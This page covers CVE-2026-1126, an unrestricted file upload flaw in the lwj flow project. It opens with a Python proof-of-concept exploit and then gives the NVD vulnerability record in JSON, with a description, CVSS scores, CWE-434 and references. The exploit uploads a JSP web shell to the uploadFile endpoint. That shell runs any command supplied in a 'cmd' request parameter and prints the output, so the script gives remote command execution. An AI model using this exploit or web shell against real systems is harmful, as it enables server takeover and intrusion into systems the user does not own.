CVE-2026-1126

import requests import sys # CVE-2026-1126 PoC - Unrestricted File Upload in lwj flow # Target: lwj flow <= a3d2fe8133db9d3b50fda4f66f68634640344641 def exploit_file_upload(target_url, file_content, filename): """ Exploit the unrestricted file upload vulnerability Args: target_url: URL of the upload endpoint file_content: Malicious file content to upload filename: Name of the file to upload Returns: Response from the server """ files = { 'file': (filename, file_content, 'image/svg+xml') } try: response = requests.post(target_url, files=files, timeout=10) return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def main(): if len(sys.argv) < 3: print("Usage: python cve_2026_1126_poc.py <target_url> ") print("Example: python cve_2026_1126_poc.py http://target.com/api/resource/flow/form/uploadFile test.jsp") sys.exit(1) target_url = sys.argv[1] filename = sys.argv[2] # Malicious file content - WebShell malicious_content = '''<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ page import="java.io.*" %> <%@ page import="java.util.*" %> <%@ page import="java.text.*" %> <!DOCTYPE html> <html> <head> <title>CVE-2026-1126 Exploit</title> </head> <body> <% String cmd = request.getParameter("cmd"); if (cmd != null) { Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </body> </html>''' print(f"[*] Exploiting CVE-2026-1126 on {target_url}") print(f"[*] Uploading malicious file: {filename}") response = exploit_file_upload(target_url, malicious_content.encode(), filename) if response and response.status_code in [200, 201, 204]: print(f"[+] File uploaded successfully!") print(f"[+] Status code: {response.status_code}") print(f"[+] Response: {response.text}") else: print(f"[-] Upload failed. Status: {response.status_code if response else 'No response'}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-1126", "sourceIdentifier": "[email protected]", "published": "2026-01-18T17:15:49.713", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in lwj flow up to a3d2fe8133db9d3b50fda4f66f68634640344641. This affects the function uploadFile of the file \\flow-master\\flow-front-rest\\src\\main\\java\\com\\dragon\\flow\\web\\resource\\flow\\FormResource.java of the component SVG File Handler. The manipulation of the argument File leads to unrestricted upload. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se ha detectado una vulnerabilidad de seguridad en lwj flow hasta a3d2fe8133db9d3b50fda4f66f68634640344641. Esto afecta a la función uploadFile del archivo \\flow-master\\flow-front-rest\\src\\main\\java\\com\\dragon\\flow\\web\\resource\\flow\\FormResource.java del componente SVG File Handler. La manipulación del argumento File conduce a una carga sin restricciones. El ataque puede llevarse a cabo de forma remota. El exploit ha sido divulgado públicamente y puede ser utilizado. Este producto adopta una estrategia de lanzamiento continuo para mantener la entrega continua. Por lo tanto, los detalles de la versión para las versiones afectadas o actualizadas no pueden especificarse. Se informó al proyecto del problema con antelación a través de un informe de incidencias, pero aún no ha respondido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://gitee.com/lwj/flow/", "source": "[email protected]"}, {"url": "https://gitee.com/lwj/flow/issues/IDIQSE", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.341718", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.341718", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.735122", "source": "[email protected]"}]}}